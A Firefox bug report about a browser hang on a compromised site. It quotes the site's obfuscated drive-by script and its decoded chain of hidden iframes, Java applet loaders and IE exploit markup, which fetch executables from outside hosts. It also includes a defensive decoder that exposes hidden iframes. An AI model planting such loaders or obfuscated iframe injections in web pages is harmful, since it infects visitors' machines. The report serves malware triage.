Closed Bug 320760 Opened 19 years ago Closed 19 years ago

Browser hangs at 100% CPU following document.write by malicious javascript

Categories

(Firefox :: General, defect)

x86
Windows XP
defect
Not set
critical

RESOLVED DUPLICATE of bug 317334

People

(Reporter: mike.capp, Unassigned)

Attachments

(3 files)

User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8) Gecko/20051111 Firefox/1.5
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8) Gecko/20051111 Firefox/1.5

Visiting the URL above caused browser to hang shortly afterwards. No unresponsive-script or other dialogs were shown. Eventually had to kill the app via Task Manager. 

There's a malicious script snippet at the bottom of the page's source doing document.write()s; strongly suspect (but haven't confirmed) that it's writing requests for other resources which cause the lockup on arrival. Googling for (nonsensical) substrings in the script returned lots of hits; this looks like a fairly widely-disseminated exploit.

Similar results when visiting the page in Opera 8.02 and (a freshly patched today) IE6. If this is an exploit it's probably not targeting Moz specifically. I'm marking "security" to be on the safe side, but beyond the dataloss involved in killing the browser I'm not seeing any obvious persistent ill-effects.

Reproducible: Always

Steps to Reproduce:
1. Visit URL above

I've mailed the site owner to let him know of the problem, so it may have been fixed by the time you come to look at it. I'll attach a cut-down version of the page that triggers the same symptoms.

Actual Results:  
Unrecoverable hang.

Expected Results:  
Browser should remain responsive (maybe pop up the standard "Warning: unresponsive script" dialog if appropriate).
Cut-down version of problem page, triggering the same symptoms, in case the original has been disinfected by now.

The visible link to http://allsafedestruction.com/Planer_2004.06_crack.shtml was in the original page - I don't know whether it was supposed to be there, or was inserted at the same time as the script, but it looked a little out of place.
the script at the bottom of the page 

k='?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4>#wrs=#4%A?liudph#vuf@%kwws=22xvhu4:1liudph1ux2Brv@|hv%#iudpherughu@3#yvsdfh@3#kvsdfh@3#zlgwk@4#khljkw@4#pdujlqzlgwk@3#pdujlqkhljkw@3#vfuroolqj@qrA?2liudphA?2glyA',t=0,h='';while(t<=k.length-1){h=h+String.fromCharCode(k.charCodeAt(t++)-3);}

decodes to 

<div style="visibility: hidden; position: absolute; left: 1; top: 1"><iframe src="http://user17.iframe.ru/?os=yes" frameborder=0 vspace=0 hspace=0 width=1 height=1 marginwidth=0 marginheight=0 scrolling=no></iframe></div>

which contains:

<html><body>
<iframe src='http://toolbartraff.biz/dl/adv719.php' WIDTH=0 BORDER=0 HEIGHT=0 style="display:none"></iframe>
</body></html>

which contains:

<html>
<head>
<style>
* {CURSOR: url("http://toolbartraff.biz/dl/adv719/sploit.anr")}
</style>
</head>
<body>
<applet archive="java.jar" code="GetAccess.class" width=1 height=1><param name="ModulePath" value="http://toolbartraff.biz/dl/loaderadv719.exe"></applet>

<iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv719.htm></iframe>
<iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv719.htm></iframe>
<iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv719.htm></iframe>
<iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv719.htm></iframe>
<iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv719.htm></iframe>
<iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv719.htm></iframe>
<iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv719.htm></iframe>
<iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv719.htm></iframe>
<iframe width=1 height=1 border=0 frameborder=0 src=bag.htm></iframe>

<applet width=1 height=1 ARCHIVE=loaderadv719.jar code=Counter></APPLET>
<SCRIPT LANGUAGE="JavaScript">
obj = "<object data=\"ms-its:mhtml:file";
obj1 = "://C:\\nosuch.mht!http://toolbartraff.biz/dl/adv719/x.chm::/x.htm\" type=\"text/x-scriptlet\"></object>";
document.write(obj+obj1);
</script>
</body>
</html>

definitely an attempt to exploit known IE vulnerabilities. bag.htm is the IE window() exploit. I'll attach bag.htm and fillmemadv719.htm.
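
The decoding step described in the comment above, as an added example that is not part of the original bug comments: a static decoder that recovers the markup from the shifted string without evaluating it, then lists the iframes it would have written and whether they are hidden. It goes beyond the fixed shift of 3 by trying small shifts until the output looks like markup; the function names are hypothetical, and the regex-based tag scan is an assumption suited to short payloads like this one, not a full HTML parser.

```javascript
// Added example: static decoder for char-shift obfuscated document.write payloads.
// ENCODED is the string k from the script quoted in this bug; nothing is evaluated.
const ENCODED = '?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4>#wrs=#4%A' +
  '?liudph#vuf@%kwws=22xvhu4:1liudph1ux2Brv@|hv%#iudpherughu@3#yvsdfh@3#kvsdfh@3' +
  '#zlgwk@4#khljkw@4#pdujlqzlgwk@3#pdujlqkhljkw@3#vfuroolqj@qrA?2liudphA?2glyA';

// Subtract `shift` from every char code, as the quoted while-loop does with 3.
function unshift(text, shift) {
  return Array.from(text, c => String.fromCharCode(c.charCodeAt(0) - shift)).join('');
}

// Try small shifts and keep the first whose output looks like markup.
function findShift(text, maxShift = 25) {
  const markup = /<\s*(iframe|script|object|applet|div|html)\b/i;
  for (let s = 1; s <= maxShift; s++) {
    if (markup.test(unshift(text, s))) return s;
  }
  return null;
}

// Pull out iframe tags and flag those sized or styled to be invisible.
function findIframes(html) {
  const hiddenParent = /visibility\s*:\s*hidden|display\s*:\s*none/i.test(html);
  const out = [];
  for (const m of html.matchAll(/<iframe\b[^>]*>/gi)) {
    const tag = m[0];
    const attr = name => {
      const a = new RegExp(`\\b${name}\\s*=\\s*(?:"([^"]*)"|'([^']*)'|([^\\s>]+))`, 'i').exec(tag);
      return a ? (a[1] ?? a[2] ?? a[3]) : null;
    };
    const w = parseInt(attr('width'), 10), h = parseInt(attr('height'), 10);
    out.push({ src: attr('src'), tiny: w <= 1 && h <= 1, hiddenParent });
  }
  return out;
}

// Decode and report; returns an empty result when no shift yields markup.
function analyze(encoded) {
  const shift = findShift(encoded);
  const html = shift === null ? '' : unshift(encoded, shift);
  return { shift, html, iframes: findIframes(html) };
}

console.log(analyze(ENCODED));
```
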
Agreed with the analysis: this is the usual grab-bag of IE exploits thrown at the visitor to see what sticks. It's the IE onload=window() exploit that causes the browser to crawl. Firefox isn't vulnerable to the exploit itself, but the huge prompt string tickles a particularly inefficient algorithm.

(I didn't check the java archive for which specific exploit is being used. I expect it is Trojan.ByteVerifier (an IE exploit) since that's what it always is. It could be aimed at a patched Sun JVM bug, though)

*** This bug has been marked as a duplicate of 317334 ***
Group: security
Status: UNCONFIRMED → RESOLVED
Closed: 19 years ago
Resolution: --- → DUPLICATE